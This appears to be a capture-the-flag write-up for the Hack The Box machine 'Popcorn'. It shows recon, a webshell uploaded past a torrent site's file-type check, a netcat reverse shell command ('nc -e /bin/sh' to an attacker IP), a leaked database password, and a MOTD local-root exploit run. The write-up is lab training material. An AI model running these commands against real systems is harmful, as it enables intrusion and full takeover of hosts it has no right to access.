Popcorn

Created At: Updated At:

Recon

└──╼ $whatweb http://popcorn.htb/
http://popcorn.htb/ [200 OK] Apache[2.2.12], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.2.12 (Ubuntu)], IP[10.129.161.86]
$nmap -p- -A 10.129.161.86
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_  2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open  http    Apache httpd 2.2.12
|_http-title: Did not follow redirect to http://popcorn.htb/
|_http-server-header: Apache/2.2.12 (Ubuntu)
Service Info: Host: popcorn.hackthebox.gr; OS: Linux; CPE: cpe:/o:linux:linux_kernel

In /test.php we can see all of the configs of the server, screen has just the beginning.

/torrent get’s us Torrent Hoster for 2007.

The upload button immidietly got my attention. To access this panel we have to create an account, but creating them is not locked, so it’s not a problem.

We can upload a .torrent file and make it accessible to others. I tried to edit the data being sent, but my php webshell was not considered a valid torrent file for some reason.

Pressing Edit torrent get’s us a new window.

We can get a cool cat for our cool linux distro. Now let’s get even cooler webshell. First I tried changing both content type and file type. Got Invalid file. Then, just file type. Got Invalid file. Lastly…

Looking at a webshell is not considered a nice image on this site, but we can right click it and open in a new tab to see it in its full glory.

Running ls /home gets us home folder for george. Unfortunetly he does not have .ssh file in his directory, so we have to run reverse shell.

# on victim
nc -e /bin/sh 10.10.16.30 4444

# on host
nc -lvnp 4444

Shell stabilisationfor Qol.

python -c 'import pty;pty.spawn("bash")'
^Z
stty raw -echo 
fg

Priv Esc

Running linpeas get’s us only root for the site.

══════════╣ Searching passwords in config PHP files
/var/www/torrent/config.php:	$dbpass 	= $CFG->dbPassword;
/var/www/torrent/config.php:	$dbuser 	= $CFG->dbUserName;
/var/www/torrent/config.php:  $CFG->dbPassword = "SuperSecret!!";	//db password
/var/www/torrent/config.php:  $CFG->dbUserName = "torrent";    //db username

Let’s see what we have in home dir.

www-data@popcorn:/home/george$ ls -lar
total 860
-rw-r--r-- 1 george george     33 Oct 20 17:51 user.txt
-rw-r--r-- 1 george george 848727 Mar 17  2017 torrenthoster.zip
-rw-r--r-- 1 george george      0 Mar 17  2017 .sudo_as_admin_successful
-rw-r--r-- 1 george george    675 Mar 17  2017 .profile
drwxr-xr-x 2 george george   4096 Mar 17  2017 .cache
-rw-r--r-- 1 george george   3180 Mar 17  2017 .bashrc
-rw-r--r-- 1 george george    220 Mar 17  2017 .bash_logout
lrwxrwxrwx 1 george george      9 Oct 26  2020 .bash_history -> /dev/null
drwxr-xr-x 3 root   root     4096 Mar 17  2017 ..
drwxr-xr-x 3 george george   4096 Oct 26  2023 .
www-data@popcorn:/home/george$ ls -laR
.:
total 860
drwxr-xr-x 3 george george   4096 Oct 26  2023 .
drwxr-xr-x 3 root   root     4096 Mar 17  2017 ..
lrwxrwxrwx 1 george george      9 Oct 26  2020 .bash_history -> /dev/null
-rw-r--r-- 1 george george    220 Mar 17  2017 .bash_logout
-rw-r--r-- 1 george george   3180 Mar 17  2017 .bashrc
drwxr-xr-x 2 george george   4096 Mar 17  2017 .cache
-rw-r--r-- 1 george george    675 Mar 17  2017 .profile
-rw-r--r-- 1 george george      0 Mar 17  2017 .sudo_as_admin_successful
-rw-r--r-- 1 george george 848727 Mar 17  2017 torrenthoster.zip
-rw-r--r-- 1 george george     33 Oct 20 17:51 user.txt

./.cache:
total 8
drwxr-xr-x 2 george george 4096 Mar 17  2017 .
drwxr-xr-x 3 george george 4096 Oct 26  2023 ..
-rw-r--r-- 1 george george    0 Mar 17  2017 motd.legal-displayed

The only thing that not standard is the motd.legal-displayed.

motd.legal-displayed is a parameter related to the “Message of the Day” (MOTD) on Linux systems, specifically Ubuntu or other Debian-based distributions. MOTD is a message that is displayed to users when they log into the system via a terminal or SSH.

Looking at exploit-db we can see that it allows us to get root quite easily. I tested it and it works flawlessly.

www-data@popcorn:~$ ./script 
[*] Ubuntu PAM MOTD local root
[*] Backuped /var/www/.ssh/authorized_keys
[*] SSH key set up
[*] Backuped /var/www/.cache
[*] spawn ssh
[+] owned: /etc/passwd
[*] spawn ssh
[+] owned: /etc/shadow
[*] Restored /var/www/.cache
[*] Restored /var/www/.ssh/authorized_keys
[*] SSH key removed
[+] Success! Use password toor to get root
Password: 
root@popcorn:/var/www# ls
backup  index.html  pwn  rename  script  test.php  torrent
root@popcorn:/var/www# cd /root
root@popcorn:~# ls
root.txt